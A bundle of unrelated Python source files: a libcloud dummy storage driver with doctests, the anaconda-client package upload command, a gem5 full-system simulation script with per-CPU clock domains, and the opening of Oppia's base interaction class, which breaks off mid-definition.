>>> obj.size == file_size
True
@inherits: L{StorageDriver.upload_object}
@param file_hash: File hash
@type file_hash: C{str}
"""
if not os.path.exists(file_path):
raise LibcloudError(value='File %s does not exist' % (file_path),
driver=self)
size = os.path.getsize(file_path)
return self._add_object(container=container, object_name=object_name,
size=size, extra=extra)
def upload_object_via_stream(self, iterator, container,
object_name, extra=None):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(
... container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
>>> obj = container.upload_object_via_stream(
... object_name='test object', iterator=DummyFileObject(5, 10), extra={})
>>> obj #doctest: +ELLIPSIS
<Object: name=test object, size=50, ...>
@inherits: L{StorageDriver.upload_object_via_stream}
"""
size = len(iterator)
return self._add_object(container=container, object_name=object_name,
size=size, extra=extra)
def delete_object(self, obj):
"""
>>> driver = DummyStorageDriver('key', 'secret')
>>> container = driver.create_container(
... container_name='test container 1') #doctest: +IGNORE_EXCEPTION_DETAIL
>>> obj = container.upload_object_via_stream(object_name='test object',
... iterator=DummyFileObject(5, 10), extra={})
>>> obj #doctest: +ELLIPSIS
<Object: name=test object, size=50, ...>
>>> container.delete_object(obj=obj)
True
>>> obj = Object(name='test object 2',
... size=1000, hash=None, extra=None,
... meta_data=None, container=container,driver=None)
>>> container.delete_object(obj=obj) #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ObjectDoesNotExistError:
@inherits: L{StorageDriver.delete_object}
"""
container_name = obj.container.name
object_name = obj.name
obj = self.get_object(container_name=container_name,
object_name=object_name)
del self._containers[container_name]['objects'][object_name]
return True
def _add_object(self, container, object_name, size, extra=None):
container = self.get_container(container.name)
extra = extra or {}
meta_data = extra.get('meta_data', {})
meta_data.update({'cdn_url': 'http://www.test.com/object/%s' %
(object_name.replace(' ', '_'))})
obj = Object(name=object_name, size=size, extra=extra, hash=None,
meta_data=meta_data, container=container, driver=self)
self._containers[container.name]['objects'][object_name] = obj
return obj
if __name__ == "__main__":
import doctest
doctest.testmod()
| |
"""
anaconda upload CONDA_PACKAGE_1.bz2
anaconda upload notebook.ipynb
anaconda upload environment.yml
##### See Also
* [Uploading a Conda Package](https://docs.anaconda.com/anaconda-repository/user-guide/tasks/pkgs/use-pkg-managers/#uploading-a-conda-package)
* [Uploading a PyPI Package](https://docs.anaconda.com/anaconda-repository/user-guide/tasks/pkgs/use-pkg-managers/#uploading-pypi-packages)
"""
from __future__ import unicode_literals
import argparse
import tempfile
import logging
import os
import subprocess
from glob import glob
from os.path import exists
import nbformat
from six.moves import input
from binstar_client import errors
from binstar_client.utils import bool_input, DEFAULT_CONFIG, get_config, get_server_api, upload_print_callback
from binstar_client.utils.config import PACKAGE_TYPES
from binstar_client.utils.projects import upload_project
from binstar_client.utils.detect import detect_package_type, get_attrs
logger = logging.getLogger('binstar.upload')
def verbose_package_type(pkg_type, lowercase=True):
verbose_type = PACKAGE_TYPES.get(pkg_type, 'unknown')
if lowercase:
verbose_type = verbose_type.lower()
return verbose_type
def create_release(aserver_api, username, package_name, version, release_attrs, announce=None):
aserver_api.add_release(username, package_name, version, [], announce, release_attrs)
def create_release_interactive(aserver_api, username, package_name, version, release_attrs):
logger.info('The release "%s/%s/%s" does not exist', username, package_name, version)
if not bool_input('Would you like to create it now?'):
logger.info('good-bye')
raise SystemExit(-1)
description = input('Enter a short description of the release:\n')
logger.info("Announcements are emailed to your package followers.")
make_announcement = bool_input('Would you like to make an announcement to the package followers?', False)
if make_announcement:
announce = input('Markdown Announcement:\n')
else:
announce = ''
aserver_api.add_release(username, package_name, version, [], announce, release_attrs)
def determine_package_type(filename, args):
"""
return the file type from the inspected package or from the
-t/--package-type argument
"""
if args.package_type:
package_type = args.package_type
else:
logger.info('Detecting file type...')
package_type = detect_package_type(filename)
if package_type is None:
message = 'Could not detect package type of file %r please specify package type with option --package-type' % filename
logger.error(message)
raise errors.BinstarError(message)
logger.info('File type is "%s"', package_type)
return package_type
def get_package_name(args, package_attrs, filename, package_type):
if args.package:
if 'name' in package_attrs and package_attrs['name'].lower() != args.package.lower():
msg = 'Package name on the command line " {}" does not match the package name in the file "{}"'.format(
args.package.lower(), package_attrs['name'].lower()
)
logger.error(msg)
raise errors.BinstarError(msg)
package_name = args.package
else:
if 'name' not in package_attrs:
message = "Could not detect package name for package type %s, please use the --package option" % (package_type,)
logger.error(message)
raise errors.BinstarError(message)
package_name = package_attrs['name']
return package_name
def get_version(args, release_attrs, package_type):
if args.version:
version = args.version
else:
if 'version' not in release_attrs:
message = "Could not detect package version for package type %s, please use the --version option" % (package_type,)
logger.error(message)
raise errors.BinstarError(message)
version = release_attrs['version']
return version
def add_package(aserver_api, args, username, package_name, package_attrs, package_type):
try:
return aserver_api.package(username, package_name)
except errors.NotFound:
if not args.auto_register:
message = (
'Anaconda repository package %s/%s does not exist. '
'Please run "anaconda package --create" to create this package namespace in the cloud.' %
(username, package_name)
)
logger.error(message)
raise errors.UserError(message)
else:
if args.summary:
summary = args.summary
else:
if 'summary' not in package_attrs:
message = "Could not detect package summary for package type %s, please use the --summary option" % (package_type,)
logger.error(message)
raise errors.BinstarError(message)
summary = package_attrs['summary']
public = not args.private
return aserver_api.add_package(
username,
package_name,
summary,
package_attrs.get('license'),
public=public,
attrs=package_attrs,
license_url=package_attrs.get('license_url'),
license_family=package_attrs.get('license_family'),
package_type=package_type,
)
def add_release(aserver_api, args, username, package_name, version, release_attrs):
try:
# Check if the release already exists
aserver_api.release(username, package_name, version)
except errors.NotFound:
if args.mode == 'interactive':
create_release_interactive(aserver_api, username, package_name, version, release_attrs)
else:
create_release(aserver_api, username, package_name, version, release_attrs)
def remove_existing_file(aserver_api, args, username, package_name, version, file_attrs):
try:
aserver_api.distribution(username, package_name, version, file_attrs['basename'])
except errors.NotFound:
return False
else:
if args.mode == 'force':
logger.warning('Distribution "%s" already exists. Removing.', file_attrs['basename'])
aserver_api.remove_dist(username, package_name, version, file_attrs['basename'])
if args.mode == 'interactive':
if bool_input('Distribution "%s" already exists. Would you like to replace it?' % file_attrs['basename']):
aserver_api.remove_dist(username, package_name, version, file_attrs['basename'])
else:
logger.info('Not replacing distribution "%s"', file_attrs['basename'])
return True
def upload_package(filename, package_type, aserver_api, username, args):
logger.info('Extracting {} attributes for upload'.format(verbose_package_type(package_type)))
try:
package_attrs, release_attrs, file_attrs = get_attrs(package_type, filename, parser_args=args)
except Exception:
message = 'Trouble reading metadata from {}. Is this a valid {} package?'.format(
filename, verbose_package_type(package_type)
)
logger.error(message)
if args.show_traceback:
raise
raise errors.BinstarError(message)
if args.build_id:
file_attrs['attrs']['binstar_build'] = args.build_id
if args.summary:
release_attrs['summary'] = args.summary
if args.description:
release_attrs['description'] = args.description
package_name = get_package_name(args, package_attrs, filename, package_type)
version = get_version(args, release_attrs, package_type)
logger.info('Creating package "%s"', package_name)
package = add_package(aserver_api, args, username, package_name, package_attrs, package_type)
package_types = package.get('package_types', [])
allowed_package_types = set(package_types)
for group in [{'conda', 'pypi'}]:
if allowed_package_types & group:
allowed_package_types.update(group)
if package_types and (package_type not in allowed_package_types):
message = 'You already have a {} named \'{}\'. Use a different name for this {}.'.format(
verbose_package_type(package_types[0] if package_types else ''), package_name,
verbose_package_type(package_type),
)
logger.error(message)
raise errors.BinstarError(message)
logger.info('Creating release "%s"', version)
add_release(aserver_api, args, username, package_name, version, release_attrs)
binstar_package_type = file_attrs.pop('binstar_package_type', package_type)
logger.info('Uploading file "%s/%s/%s/%s"', username, package_name, version, file_attrs['basename'])
if remove_existing_file(aserver_api, args, username, package_name, version, file_attrs):
return
try:
with open(filename, 'rb') as fd:
upload_info = aserver_api.upload(username, package_name, version, file_attrs['basename'], fd,
binstar_package_type, args.description,
dependencies=file_attrs.get('dependencies'), attrs=file_attrs['attrs'],
channels=args.labels, callback=upload_print_callback(args))
except errors.Conflict:
upload_info = {}
if args.mode != 'skip':
logger.info('Distribution already exists. Please use the -i/--interactive or --force or --skip options '
'or `anaconda remove %s/%s/%s/%s', username, package_name, version, file_attrs['basename'])
raise
logger.info('Distribution already exists. Skipping upload.\n')
if upload_info:
logger.info("Upload complete\n")
return [package_name, upload_info]
def get_convert_files(files):
tmpdir = tempfile.mkdtemp()
for filepath in files:
logger.info('Running conda convert on "%s"', filepath)
process = subprocess.Popen(
['conda-convert', '-p', 'all', filepath, '-o', tmpdir],
stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
stdout, stderr = process.communicate()
if stderr:
logger.warning('Couldn\'t generate platform packages for %s: %s', filepath, stderr)
result = []
for path, dirs, files in os.walk(tmpdir):
for filename in files:
result.append(os.path.join(path, filename))
return result
def main(args):
config = get_config(site=args.site)
aserver_api = get_server_api(token=args.token, site=args.site, config=config)
aserver_api.check_server()
validate_username = True
if args.user:
username = args.user
elif 'upload_user' in config:
username = config['upload_user']
else:
validate_username = False
user = aserver_api.user()
username = user['login']
logger.info('Using "%s" as upload username', username)
if validate_username:
try:
aserver_api.user(username)
except errors.NotFound:
message = 'User "{}" does not exist'.format(username)
logger.error(message)
raise errors.BinstarError(message)
uploaded_packages = []
uploaded_projects = []
# Flatten file list because of 'windows_glob' function
files = [f for fglob in args.files for f in fglob]
if args.all:
files += get_convert_files(files)
for filename in files:
if not exists(filename):
message = 'File "{}" does not exist'.format(filename)
logger.error(message)
raise errors.BinstarError(message)
else:
logger.info("Processing '%s'", filename)
package_type = determine_package_type(filename, args)
if package_type == 'project':
uploaded_projects.append(upload_project(filename, args, username))
else:
if package_type == 'ipynb' and not args.mode == 'force':
try:
nbformat.read(open(filename), nbformat.NO_CONVERT)
except Exception as error:
logger.error("Invalid notebook file '%s': %s", filename, error)
logger.info("Use --force to upload the file anyways")
continue
package_info = upload_package(
filename,
package_type=package_type,
aserver_api=aserver_api,
username=username,
args=args)
if package_info is not None and len(package_info) == 2:
_package, _upload_info = package_info
if _upload_info:
uploaded_packages.append(package_info)
for package, upload_info in uploaded_packages:
package_url = upload_info.get('url', 'https://anaconda.org/%s/%s' % (username, package))
logger.info("{} located at:\n{}\n".format(verbose_package_type(package_type), package_url))
for project_name, url in uploaded_projects:
logger.info("Project {} uploaded to {}.\n".format(project_name, url))
def windows_glob(item):
if os.name == 'nt' and '*' in item:
return glob(item)
else:
return [item]
def add_parser(subparsers):
description = 'Upload packages to your Anaconda repository'
parser = subparsers.add_parser('upload',
formatter_class=argparse.RawDescriptionHelpFormatter,
help=description, description=description,
epilog=__doc__)
parser.add_argument('files', nargs='+', help='Distributions to upload', default=[], type=windows_glob)
label_help = (
'{deprecation}Add this file to a specific {label}. '
'Warning: if the file {label}s do not include "main", '
'the file will not show up in your user {label}')
parser.add_argument('-c', '--channel', action='append', default=[], dest='labels',
help=label_help.format(deprecation='[DEPRECATED]\n', label='channel'),
metavar='CHANNELS')
parser.add_argument('-l', '--label', action='append', dest='labels',
help=label_help.format(deprecation='', label='label'))
parser.add_argument('--no-progress', help="Don't show upload progress", action='store_true')
parser.add_argument('-u', '--user', help='User account or Organization, defaults to the current user')
parser.add_argument('--all', help='Use conda convert to generate packages for all platforms and upload them',
action='store_true')
mgroup = parser.add_argument_group('metadata options')
mgroup.add_argument('-p', '--package', help='Defaults to the package name in the uploaded file')
mgroup.add_argument('-v', '--version', help='Defaults to the package version in the uploaded file')
mgroup.add_argument('-s', '--summary', help='Set the summary of the package')
# To preserve current behavior
pkgs = PACKAGE_TYPES.copy()
pkgs.pop('conda')
pkgs.pop('pypi')
pkg_types = ', '.join(list(pkgs.keys()))
mgroup.add_argument('-t', '--package-type', help='Set the package type [{0}]. Defaults to autodetect'.format(pkg_types))
mgroup.add_argument('-d', '--description', help='description of the file(s)')
mgroup.add_argument('--thumbnail', help='Notebook\'s thumbnail image')
mgroup.add_argument('--private', help="Create the package with private access", action='store_true')
register_group = parser.add_mutually_exclusive_group()
register_group.add_argument("--no-register", dest="auto_register", action="store_false",
help='Don\'t create a new package namespace if it does not exist')
register_group.add_argument("--register", dest="auto_register", action="store_true",
help='Create a new package namespace if it does not exist')
parser.set_defaults(auto_register=DEFAULT_CONFIG.get('auto_register', True))
parser.add_argument('--build-id', help='Anaconda repository Build ID (internal only)')
group = parser.add_mutually_exclusive_group()
group.add_argument('-i', '--interactive', action='store_const', help='Run an interactive prompt if any packages are missing',
dest='mode', const='interactive')
group.add_argument('-f', '--fail', help='Fail if a package or release does not exist (default)',
action='store_const', dest='mode', const='fail')
group.add_argument('--force', help='Force a package upload regardless of errors',
action='store_const', dest='mode', const='force')
group.add_argument('--skip-existing', help='Skip errors on package batch upload if it already exists',
action='store_const', dest='mode', const='skip')
parser.set_defaults(main=main)
| |
# Copyright (c) 2010-2013 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2012-2014 Mark D. Hill and David A. Wood
# Copyright (c) 2009-2011 Advanced Micro Devices, Inc.
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
# Brad Beckmann
import optparse
import sys
import m5
from m5.defines import buildEnv
from m5.objects import *
from m5.util import addToPath, fatal
addToPath('../common')
addToPath('../ruby')
import Ruby
from FSConfig import *
from SysPaths import *
from Benchmarks import *
import Simulation
import CacheConfig
import MemConfig
from Caches import *
import Options
# Check if KVM support has been enabled, we might need to do VM
# configuration if that's the case.
have_kvm_support = 'BaseKvmCPU' in globals()
def is_kvm_cpu(cpu_class):
return have_kvm_support and cpu_class != None and \
issubclass(cpu_class, BaseKvmCPU)
def initO3params(options, num_cpus, testsys):
for i in range(0, num_cpus):
testsys.cpu[i].rob_scale_enabled = options.rob_scale_enabled
print 'for cpu:%d rob_scale_enabled:%d' % (i, testsys.cpu[i].rob_scale_enabled)
testsys.cpu[i].btb_scale_enabled = options.btb_scale_enabled
print 'for cpu:%d btb_scale_enabled:%d' % (i, testsys.cpu[i].btb_scale_enabled)
testsys.cpu[i].tlb_scale_enabled = options.tlb_scale_enabled
print 'for cpu:%d tlb_scale_enabled:%d' % (i, testsys.cpu[i].tlb_scale_enabled)
testsys.cpu[i].iq_scale_enabled = options.iq_scale_enabled
print 'for cpu:%d iq_scale_enabled:%d' % (i, testsys.cpu[i].iq_scale_enabled)
testsys.cpu[i].regfile_scale_enabled = options.regfile_scale_enabled
print 'for cpu:%d regfile_scale_enabled:%d' % (i, testsys.cpu[i].regfile_scale_enabled)
testsys.cpu[i].lsq_scale_enabled = options.lsq_scale_enabled
print 'for cpu:%d lsq_scale_enabled:%d' % (i, testsys.cpu[i].lsq_scale_enabled)
testsys.cpu[i].alu_scale_enabled = options.alu_scale_enabled
print 'for cpu:%d alu_scale_enabled:%d' % (i, testsys.cpu[i].alu_scale_enabled)
testsys.cpu[i].fpu_scale_enabled = options.fpu_scale_enabled
print 'for cpu:%d fpu_scale_enabled:%d' % (i, testsys.cpu[i].fpu_scale_enabled)
testsys.cpu[i].dcache_scale_enabled = options.dcache_scale_enabled
print 'for cpu:%d dcache_scale_enabled:%d' % (i, testsys.cpu[i].dcache_scale_enabled)
testsys.cpu[i].icache_scale_enabled = options.icache_scale_enabled
print 'for cpu:%d icache_scale_enabled:%d' % (i, testsys.cpu[i].icache_scale_enabled)
def build_test_system(np):
if buildEnv['TARGET_ISA'] == "alpha":
test_sys = makeLinuxAlphaSystem(test_mem_mode, bm[0], options.ruby)
elif buildEnv['TARGET_ISA'] == "mips":
test_sys = makeLinuxMipsSystem(test_mem_mode, bm[0])
elif buildEnv['TARGET_ISA'] == "sparc":
test_sys = makeSparcSystem(test_mem_mode, bm[0])
elif buildEnv['TARGET_ISA'] == "x86":
test_sys = makeLinuxX86System(test_mem_mode, options.num_cpus, bm[0],
options.ruby)
elif buildEnv['TARGET_ISA'] == "arm":
test_sys = makeArmSystem(test_mem_mode, options.machine_type, bm[0],
options.dtb_filename,
bare_metal=options.bare_metal,
sdcard_image=options.sdcard_image)
if options.enable_context_switch_stats_dump:
test_sys.enable_context_switch_stats_dump = True
else:
fatal("Incapable of building %s full system!", buildEnv['TARGET_ISA'])
# Set the cache line size for the entire system
test_sys.cache_line_size = options.cacheline_size
# Create a top-level voltage domain
test_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
# Create a source clock for the system and set the clock period
test_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
voltage_domain = test_sys.voltage_domain)
#Create a clk running contantly at 1.4GHz for L2
test_sys.clk_domain_const = SrcClockDomain(clock = ["1.4GHz"],
voltage_domain = test_sys.voltage_domain)
# Create a CPU voltage domain
test_sys.cpu_voltage_domain = VoltageDomain()
# Create a source clock for the CPUs and set the clock period
#test_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
# voltage_domain =
# test_sys.cpu_voltage_domain)
#test_sys.cpu_clk_domain = SrcClockDomain(clock = ["3GHz","2GHz","1GHz"],
test_sys.cpu_clk_domain = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
voltage_domain =
test_sys.cpu_voltage_domain,
domain_id=0)
test_sys.cpu_clk_domain1 = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
voltage_domain =
test_sys.cpu_voltage_domain,
domain_id=1)
test_sys.cpu_clk_domain2 = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
voltage_domain =
test_sys.cpu_voltage_domain,
domain_id=2)
test_sys.cpu_clk_domain3 = SrcClockDomain(clock = ["1.4GHz", "1.3GHz", "1.2GHz", "1.1GHz", "1GHz", "0.9GHz", "0.8GHz", "0.7GHz", "0.6GHz", "0.5GHz", "0.4GHz", "0.3GHz", "0.2GHz"],
voltage_domain =
test_sys.cpu_voltage_domain,
domain_id=3)
if options.kernel is not None:
test_sys.kernel = binary(options.kernel)
if options.script is not None:
test_sys.readfile = options.script
if options.lpae:
test_sys.have_lpae = True
if options.virtualisation:
test_sys.have_virtualization = True
test_sys.init_param = options.init_param
# For now, assign all the CPUs to the same clock domain
#test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=i)
# for i in xrange(np)]
test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=0, socket_id=0), TestCPUClass(clk_domain=test_sys.cpu_clk_domain1, cpu_id=1, socket_id=1), TestCPUClass(clk_domain=test_sys.cpu_clk_domain2, cpu_id=2, socket_id=2), TestCPUClass(clk_domain=test_sys.cpu_clk_domain3, cpu_id=3, socket_id=3)]
if is_kvm_cpu(TestCPUClass) or is_kvm_cpu(FutureClass):
test_sys.vm = KvmVM()
test_sys.dvfs_handler.enable = True
test_sys.dvfs_handler.transform_enable = True # We do want O3 CPU to transform
test_sys.dvfs_handler.domains = [test_sys.cpu_clk_domain, test_sys.cpu_clk_domain1, test_sys.cpu_clk_domain2, test_sys.cpu_clk_domain3]
if options.ruby:
# Check for timing mode because ruby does not support atomic accesses
if not (options.cpu_type == "detailed" or options.cpu_type == "timing"):
print >> sys.stderr, "Ruby requires TimingSimpleCPU or O3CPU!!"
sys.exit(1)
Ruby.create_system(options, test_sys, test_sys.iobus, test_sys._dma_ports)
# Create a seperate clock domain for Ruby
test_sys.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock,
voltage_domain = test_sys.voltage_domain)
for (i, cpu) in enumerate(test_sys.cpu):
#
# Tie the cpu ports to the correct ruby system ports
#
cpu.clk_domain = test_sys.cpu_clk_domain
cpu.createThreads()
cpu.createInterruptController()
cpu.icache_port = test_sys.ruby._cpu_ports[i].slave
cpu.dcache_port = test_sys.ruby._cpu_ports[i].slave
if buildEnv['TARGET_ISA'] == "x86":
cpu.itb.walker.port = test_sys.ruby._cpu_ports[i].slave
cpu.dtb.walker.port = test_sys.ruby._cpu_ports[i].slave
cpu.interrupts.pio = test_sys.ruby._cpu_ports[i].master
cpu.interrupts.int_master = test_sys.ruby._cpu_ports[i].slave
cpu.interrupts.int_slave = test_sys.ruby._cpu_ports[i].master
test_sys.ruby._cpu_ports[i].access_phys_mem = True
# Create the appropriate memory controllers
# and connect them to the IO bus
test_sys.mem_ctrls = [TestMemClass(range = r) for r in test_sys.mem_ranges]
for i in xrange(len(test_sys.mem_ctrls)):
test_sys.mem_ctrls[i].port = test_sys.iobus.master
else:
if options.caches or options.l2cache:
# By default the IOCache runs at the system clock
test_sys.iocache = IOCache(addr_ranges = test_sys.mem_ranges)
test_sys.iocache.cpu_side = test_sys.iobus.master
test_sys.iocache.mem_side = test_sys.membus.slave
else:
test_sys.iobridge = Bridge(delay='50ns', ranges = test_sys.mem_ranges)
test_sys.iobridge.slave = test_sys.iobus.master
test_sys.iobridge.master = test_sys.membus.slave
# Sanity check
if options.fastmem:
if TestCPUClass != AtomicSimpleCPU:
fatal("Fastmem can only be used with atomic CPU!")
if (options.caches or options.l2cache):
fatal("You cannot use fastmem in combination with caches!")
for i in xrange(np):
if options.fastmem:
test_sys.cpu[i].fastmem = True
if options.checker:
test_sys.cpu[i].addCheckerCpu()
test_sys.cpu[i].createThreads()
CacheConfig.config_cache(options, test_sys)
MemConfig.config_mem(options, test_sys)
return test_sys
def build_drive_system(np):
# driver system CPU is always simple, so is the memory
# Note this is an assignment of a class, not an instance.
DriveCPUClass = AtomicSimpleCPU
drive_mem_mode = 'atomic'
DriveMemClass = SimpleMemory
if buildEnv['TARGET_ISA'] == 'alpha':
drive_sys = makeLinuxAlphaSystem(drive_mem_mode, bm[1])
elif buildEnv['TARGET_ISA'] == 'mips':
drive_sys = makeLinuxMipsSystem(drive_mem_mode, bm[1])
elif buildEnv['TARGET_ISA'] == 'sparc':
drive_sys = makeSparcSystem(drive_mem_mode, bm[1])
elif buildEnv['TARGET_ISA'] == 'x86':
drive_sys = makeLinuxX86System(drive_mem_mode, np, bm[1])
elif buildEnv['TARGET_ISA'] == 'arm':
drive_sys = makeArmSystem(drive_mem_mode, options.machine_type, bm[1])
# Create a top-level voltage domain
drive_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage)
# Create a source clock for the system and set the clock period
drive_sys.clk_domain = SrcClockDomain(clock = options.sys_clock,
voltage_domain = drive_sys.voltage_domain)
# Create a CPU voltage domain
drive_sys.cpu_voltage_domain = VoltageDomain()
# Create a source clock for the CPUs and set the clock period
drive_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock,
voltage_domain =
drive_sys.cpu_voltage_domain)
drive_sys.cpu = DriveCPUClass(clk_domain=drive_sys.cpu_clk_domain,
cpu_id=0)
drive_sys.cpu.createThreads()
drive_sys.cpu.createInterruptController()
drive_sys.cpu.connectAllPorts(drive_sys.membus)
if options.fastmem:
drive_sys.cpu.fastmem = True
if options.kernel is not None:
drive_sys.kernel = binary(options.kernel)
if is_kvm_cpu(DriveCPUClass):
drive_sys.vm = KvmVM()
drive_sys.iobridge = Bridge(delay='50ns',
ranges = drive_sys.mem_ranges)
drive_sys.iobridge.slave = drive_sys.iobus.master
drive_sys.iobridge.master = drive_sys.membus.slave
# Create the appropriate memory controllers and connect them to the
# memory bus
drive_sys.mem_ctrls = [DriveMemClass(range = r)
for r in drive_sys.mem_ranges]
for i in xrange(len(drive_sys.mem_ctrls)):
drive_sys.mem_ctrls[i].port = drive_sys.membus.master
drive_sys.init_param = options.init_param
return drive_sys
# Add options
parser = optparse.OptionParser()
Options.addCommonOptions(parser)
Options.addFSOptions(parser)
# Add the ruby specific and protocol specific options
if '--ruby' in sys.argv:
Ruby.define_options(parser)
(options, args) = parser.parse_args()
if args:
print "Error: script doesn't take any positional arguments"
sys.exit(1)
# system under test can be any CPU
(TestCPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options)
#lokeshjindal15
if (TestCPUClass == DerivO3CPU):
print ("**** TestCpuClass is: DerivO3CPU")
else:
print ("**** TestCpuClass is NOT DerivO3CPU")
# Match the memories with the CPUs, based on the options for the test system
TestMemClass = Simulation.setMemClass(options)
if options.benchmark:
try:
bm = Benchmarks[options.benchmark]
except KeyError:
print "Error benchmark %s has not been defined." % options.benchmark
print "Valid benchmarks are: %s" % DefinedBenchmarks
sys.exit(1)
else:
if options.dual:
bm = [SysConfig(disk=options.disk_image, mem=options.mem_size),
SysConfig(disk=options.disk_image, mem=options.mem_size)]
else:
bm = [SysConfig(disk=options.disk_image, mem=options.mem_size)]
np = options.num_cpus
test_sys = build_test_system(np)
print "cpu_type is: " + options.cpu_type
if (options.cpu_type == "detailed" or options.cpu_type == "arm_detailed" or options.cpu_type == "DerivO3CPU" or options.cpu_type == "atomic"):
print "########## Running initO3params for various scaling switches"
initO3params(options, np, test_sys)
else:
print "########## NOT Running initO3params for various scaling switches"
if len(bm) == 2:
drive_sys = build_drive_system(np)
root = makeDualRoot(True, test_sys, drive_sys, options.etherdump)
elif len(bm) == 1:
root = Root(full_system=True, system=test_sys)
else:
print "Error I don't know how to create more than 2 systems."
sys.exit(1)
if options.timesync:
root.time_sync_enable = True
if options.frame_capture:
VncServer.frame_capture = True
#m5.disableAllListeners()#lokesh to suppress gdb read error
Simulation.setWorkCountOptions(test_sys, options)
Simulation.run(options, root, test_sys, FutureClass)
| |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for defining interactions.
A note on terminology: state_customization_args refers to the values of
customization args that are provided by an exploration editor. They are
formatted as
{ca_name: {value: ca_value}}
On the other hand, interaction.customization_args refers to a combination of
the interaction customization arg spec and the value used. It is a list of
dicts, each representing a customization arg -- viz.:
[{
'name': ca_name,
'value': ca_value,
'default_value': ...,
...
}]
"""
__author__ = 'Sean Lip'
import copy
import os
from core.domain import obj_services
from core.domain import rule_domain
from extensions import domain
import feconf
import jinja_utils
import schema_utils
import utils
# Indicates that the learner view of the interaction should be displayed in the
# context of the conversation.
DISPLAY_MODE_INLINE = 'inline'
# Indicates that the learner view of the interaction should be displayed as a
# separate object from the conversation.
DISPLAY_MODE_SUPPLEMENTAL = 'supplemental'
ALLOWED_DISPLAY_MODES = [DISPLAY_MODE_SUPPLEMENTAL, DISPLAY_MODE_INLINE]
class BaseInteraction(object):
"""Base interaction definition class.
This class is not meant to be user-editable. The only methods on it should
be get()-type methods.
Note that all interactions should also include a thumbnail image of size
178 x 146 pixels. This image will be shown in the interaction selector.
"""
# The human-readable name of the interaction. Overridden in subclasses.
name = ''
# A description of the interaction. Overridden in subclasses.
description = ''
# Describes how the interaction should be displayed -- either within the
# conversation ('inline'), or as a separate object ('supplemental'). In the
# latter case, the interaction instance is reused if two adjacent states
# have the same interaction id.
display_mode = ''
# Whether this interaction should be considered terminal, i.e. it ends
# the exploration. Defaults to False.
is_terminal = False
# Whether this interaction supports training and fuzzy classification.
is_trainable = False
# Additional JS library dependencies that should be loaded in pages
# containing this interaction. These should correspond to names of files in
# feconf.DEPENDENCIES_TEMPLATES_DIR. Overridden in subclasses.
_dependency_ids = []
# The type of answer (as a string) accepted by this interaction, e.g.
# 'CodeEvaluation'.
answer_type = None
# Customization arg specifications for the component, including their
# descriptions, schemas and default values. Overridden in subclasses.
_customization_arg_specs = []
# Instructions for using this interaction, to be shown to the learner. Only
# relevant for supplemental interactions.
instructions = None
# Whether the answer is long, and would benefit from being summarized.
needs_summary = False
@property
def id(self):
